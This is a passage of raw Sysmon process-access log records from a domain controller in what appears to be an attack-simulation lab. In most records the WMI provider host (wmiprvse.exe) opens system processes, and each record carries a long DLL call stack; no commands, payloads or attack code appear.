4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6DB7-603E-C5AA-00000000AD01}2256C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DB7-603E-C5AA-00000000AD01}2256C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 